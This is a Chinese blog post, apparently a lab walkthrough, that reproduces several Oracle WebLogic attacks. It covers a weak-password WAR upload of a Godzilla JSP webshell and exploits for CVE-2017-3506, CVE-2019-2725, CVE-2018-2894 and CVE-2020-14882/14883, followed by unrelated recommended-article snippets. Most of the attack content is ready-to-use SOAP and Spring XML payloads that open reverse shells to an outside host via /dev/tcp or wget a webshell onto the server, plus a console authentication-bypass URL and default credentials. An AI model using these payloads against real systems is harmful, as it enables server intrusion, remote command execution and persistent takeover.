WebLogic中间件漏洞攻略

最新推荐文章于 2025-08-05 19:39:41 发布
最新推荐文章于 2025-08-05 19:39:41 发布
阅读量1.2k 收藏 18
点赞数 24
CC 4.0 BY-SA版权
文章标签: 中间件 web安全 安全 ide 网络安全 android studio
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_78554096/article/details/146462467

​​​​​​后台GetShell

 通过弱令进⼊后台, 传部war, getshell

使用弱口令登录 ,weblogic/Oracle@123

点击部署->安装 

点击上载文件 

点击选择文件,两个都可以 

 使用Godzilla哥斯拉生成jsp木马写入1.jsp文件,再将此文件压缩成zip文件,将此时的1.zip改为1.war

之后使用http://39.105.61.160:7001/1/1.jsp就可以访问到,可以使用此地址使用哥斯拉连接 

CVE-2017-3506

XMLDecoder列化漏洞,WeblogicWLS Security组件对外供了webserver服务中使XMLDecoder来解析户输XML数据解析列化导致任意令执

访问http://39.105.61.160:7001/wls-wsat/CoordinatorPortType可以判断wls-wsat组件是否存在

 在此页面用Burp抓包

监听8888端口 

 发送到重放器修改Content-Type: text/xml,右键修改请求方法,改为POST请求方法,将下面的代码改为自己服务器ip和监听的端口

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/39.105.61.160/8888&gt;&amp;1</string>
</void>
</array>
<void method="start"/></object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

 点击发送,成功监听到

 CVE-2019-2725

wls9-async等组件为WebLogic Server步通认应WebLogic WAR在反序列化时存在缺攻击者通过发送精构造恶意 HTTP 即可获标服在未远程执命令

访问http://39.105.61.160:7001/_async/AsyncResponseService出现图中情况,说明漏洞存在

在此页面进行抓包 

将之前的1.jsp文件放到自己服务器的根目录,改名为1.txt 

发送到重放器修改Content-Type: text/xml,右键修改请求方法,改为POST请求方法,将下面的代码改为自己服务器ip和文件名称

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>wget http://39.105.61.160/1.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/678.jsp
</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header><soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

代码的大致意思是将自己服务器的1.txt文件下载到靶场并命名为678.jsp 

访问http://39.105.61.160:7001/bea_wls_internal/678.jsp就可以访问到,之后可以使用哥斯拉连接 

​​​​​​​CVE-2018-2628

WebLogic T3协议反列化命令执(CVE-2018- 2628)

Weblogic Server中RMI 通信使T3协议Weblogic Server和其它Java程序户端或者其它 Weblogic Server之间传输数据, 例会跟踪接到程序Java虚拟JVM,T3协议通信连, 传输Java虚拟. T3协议在开WebLogic控制台攻击以通过T3协议发送恶意的的列化数据, ⾏反列化, 对存weblogic远程代⾏攻击

使用工具Java反序列化漏洞利用工具V1.7.jar

 ​​​​​​CVE-2018-2894

WebLogic件任意漏洞,Weblogic Web Service Test Page处任意漏洞Web Service Test Page ""所以漏洞定限制

通过日志寻找密码 

docker-compose logs | grep password

 base-domain -> ⾼级 -> 启动Web服务测试⻚

 点击保存 , 进⼊ config.do ⽂件进⾏设置,将工作目录修改

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.w  ebservices.wls.ws-testclient-app-wls/4mcj4y/war/css

保存后,点击安全 , 点击添加 

将之前的1.jsp放入 

提交后,按F12,找到1.jsp的代码,发现文件命名规则

 通过http://39.105.61.160:7001/ws_utc/css/config/keystore/1742720661348_1.jsp就可以访问,也可以使用哥斯拉连接

CVE-2020-14882

WebLogic远程漏洞,

CVE-2020-14882   远程过管控制件中

CVE-2020-14883   过身户在管控制⾏任何

使两个远程攻击者可通过 HTTP Oracle WebLogic ⾏任意命并完全控制主

使⽤以下url绕过登录认证,多试几次

​​​​​​​​​​​http://39.105.61.160:7001/console/css/%252e%252e%252fconsole.portal

%252e%252e%252是../的url编码 ,使用../的回溯,回到控制台首页

监听6666端口 

 ​​​​​​​

 在自己服务器上新建1.xml,改为自己的ip,端口,监听的端口

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<value><![CDATA[bash -i >& /dev/tcp/39.105.61.160/6666 0>&1]]></value>
</list>
</constructor-arg>
</bean>
</beans>

 

将网站打开

 访问下面网址

http://39.105.61.160:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://39.105.61.160/1.xml")

成功反弹shell 

 

 

WebLogic漏洞复现(附带修复方法)_weblogic漏洞修复
Python84310366的博客
06-13 1199
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,默认端口:7001WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
WebLogic漏洞复现(附带修复方法)
C233333235的博客
08-07 2558
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,默认端口:7001WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
weblogic 10.3.6的启动禁止访问反序列化参数
sinat_29185819的博客
03-02 691
很多年没写博客了,最近想重新写写,一来想把自己遇到的坑和如何解决的分享给有需要的人。二来也防止自己忘记的时候上来看看哈哈。 最近参与的项目政府单位扫描漏洞,发现了这个weblogic的反序列化漏洞,我看了一下好像最新的weblogic12.2.2.4已经禁止了访问了,那么10.3.6的版本,就需要我们手动去禁止。 第一,关闭服务,删除域路径\sifc2\servers\AdminSe...
又一次漏洞复现与分析
qq_53058639的博客
02-21 179
WeblogicWLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令执行。
WebLogic 中间件漏洞
weixin_71053667的博客
08-06 1324
Weblogic介绍WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,默认端口:7001 WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
Weblogic中间件漏洞
m0_75036923的博客
09-20 801
环境搭建漏洞复现 默认账号密码:weblogic/Oracle@123 weblogic常⽤弱⼝令:https://cirt.net/passwords?1.登录后台后,点击部署,点击安装,点击上传⽂件。2.上传war包,jsp⽊⻢压缩成zip,修改后缀为war,上传然后⼀直下⼀步3.访问部署好的war 192.168.0.115:7001/1/1.jsp。
常见中间件漏洞WebLogic
2302_77611368的博客
03-23 1973
Weblogic介绍Weblogic介绍WebLogicOracle 公司开发的一款企业级 Java EE(Java Platform, Enterprise Edition)应用服务器,广泛用于构建、部署和管理分布式企业级应用程序。它是 Java EE 规范的主要实现之一,支持高可用性、可扩展性和安全性,适用于大型企业和关键业务系统。
漏洞复现】WebLogic中间件漏洞
qq_48368964的博客
08-06 1340
WebLogic是美国Oracle公司出品的⼀个application server,确切的说是⼀个基于JAVAEE架构的中间件,默认端⼝:7001 WebLogic是⽤于开发、集成、部署和管理⼤型分布式Web应⽤、⽹络应⽤和数据库应⽤的Java应⽤服务器。将Java的动态功能和Java Enterprise标准的安全性引⼊⼤型⽹络应⽤的开发、集成、部署和管理之中。
Weblogic中间件漏洞复现
m0_72199724的博客
05-09 723
WebLogic管理端未授权的两个页面存在任意上传getshell漏洞,可直接获取权限。两个页面分别为/ws_utc/begin.do,/ws_utc/config.do未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用漏洞在受影响的WebLogicServer 上执行任意代码。
常见的中间件漏洞:WebLogic
m0_63944205的博客
08-06 1519
Weblogic Server中的RMI 通信使⽤T3协议在Weblogic Server和其它Java程序(客户端或者其它 Weblogic Server实例)之间传输数据, 服务器实例会跟踪连接到应⽤程序的每个Java虚拟机(JVM)中, 并创建T3协议通信连接, 将流量传输到Java虚拟机. T3协议在开放WebLogic控制台端⼝的应⽤上默认开 启, 攻击者可以通过T3协议发送恶意的的反序列化数据, 进⾏反序列化, 实现对存在漏洞weblogic组件 的远程代码执⾏攻击。此时达到未授权得效果。
iwebsec靶场 中间件漏洞通关笔记1-Weblogic中间件漏洞(1)
2401_84968529的博客
05-17 421
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
常见中间件漏洞复现之【WebLogic】!
muyuchen110的博客
08-06 1506
Weblogic介绍WebLogic是美国Oracle公司出品的⼀个application server,确切的说是⼀个基于JAVAEE架构的中间件,默认端⼝:7001 WebLogic是⽤于开发、集成、部署和管理⼤型分布式Web应⽤、⽹络应⽤和数据库应⽤的Java应⽤服务器。将Java的动态功能和Java Enterprise标准的安全性引⼊⼤型⽹络应⽤的开发、集成、部署和管理之中。后台弱口令GetShell漏洞描述影响范围环境搭建漏洞复现登录后台后,点击部署,点击安装,点击上传文件。
traefik网关鉴权中间件转发multipart/form-data请求的multipart: NextPart: EOF问题
lixiaonan0318的博客
08-04 316
虽然网关还是会把 Body 和 Header 全部转发过来,但是接口不做 Body 处理,就不会出现 Body 读取的问题了,而且无需为无用的 Body 分配内存。解析到 Content-Type 是 multipart/form-data 格式,会尝试去解析这个包含文件二进制数据的 Body,但是鉴权接口并没有定义文件字段。user-auth 是一个 forwardAuth 中间件,用于做全局的用户鉴权,返回了400。第一种:在 forwardAuth 中间件中显式定义转发的请求头。
GoLand 项目从 0 到 1:第五天 —— 角色权限中间件实现与事务控制
最新发布
weixin_46303384的博客
08-05 51
摘要:第五天开发完成了权限校验核心功能:1. 实现基于Gin的权限中间件,通过接口路径关联权限ID,并验证用户角色权限;2. 开发用户权限管理接口,采用GORM事务确保多表操作原子性;3. 建立完整的权限控制链路:JWT认证→权限中间件校验→业务接口执行。系统实现了接口级别的精细化权限控制,为后续业务模块提供了安全基础。
脚手架开发-准备配置-配置文件的准备项目的一些中间件
m0_64056556的博客
08-05 600
本文介绍了将SpringBoot项目部署到Docker环境的完整流程。首先需要将项目文件上传至虚拟机指定目录,使用docker-compose命令启动容器服务。接着详细说明了数据库管理工具DBeaver的安装配置,包括设置阿里云Maven镜像源和连接MySQL数据库。同时介绍了Redis和RabbitMQ可视化工具的使用方法,以及Nacos配置中心的访问方式。文中特别提醒了可能遇到的网络连接问题,建议在虚拟机本地访问服务,并指出前期MySQL配置可能存在需要修正的问题。完成这些步骤后,即可实现项目的容器化部
FastAPI入门:中间件、CORS跨域资源共享、SQL数据库
m0_52049533的博客
08-04 1075
"中间件"是一个函数,它在每个请求被特定的路径操作处理之前,以及在每个响应返回之前工作.要创建中间件你可以在函数的顶部使用装饰器 @app.middleware(“http”)在任何路径操作收到request前,可以添加要和请求一起运行的代码.也可以在响应生成但是返回之前添加代码.
项目配置文件正确但是启动失败,报配置文件内容错误或中间件地址与实际不符
qq_39035267的博客
08-04 129
摘要:调试项目时通过命令行指定本地yml启动,导致后续修改项目yml后配置不生效。Spring Boot配置文件加载优先级为:外部配置>内部配置,命令行参数最优先。具体路径顺序为:Jar包外config目录>Jar包根目录>Jar包内config目录>Jar包内根目录。同路径下properties格式优先于yml/yaml。这解释了为何本地yml覆盖了项目中的yml配置。
分布式文件系统06-分布式中间件弹性扩容与rebalance冲平衡
iNiBuBian的博客
08-05 255
当宕机的DataNode-A重新启动后的下一次心跳发送到NameNode时,NameNode就会把这25w个RemoveReplicaTask都下发给DataNode-A,DataNode-A拿到这25w个RemoveReplicaTask后,就会开始执行它们,对应的也就是删除DataNode-A本地的25万个文件副本。某个之前某个宕机的数据节点DataNode-A又重启后,肯定会再次注册,并进行全量上报的流程,此时,就会导致DataNode-A上的文件副本,实际上在整个DataNode集群中存了3份。
中间件漏洞详解:Tomcat、Weblogic、Nginx、JBOSS安全总结
“常见中间件漏洞总结PPT,涵盖了包括Tomcat、Weblogic、Nginx、IIS、Jboss在内的多种中间件的常见安全漏洞和相关知识,适合培训和学习。” 在IT行业中,中间件扮演着至关重要的角色,它是一种介于操作系统和应用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值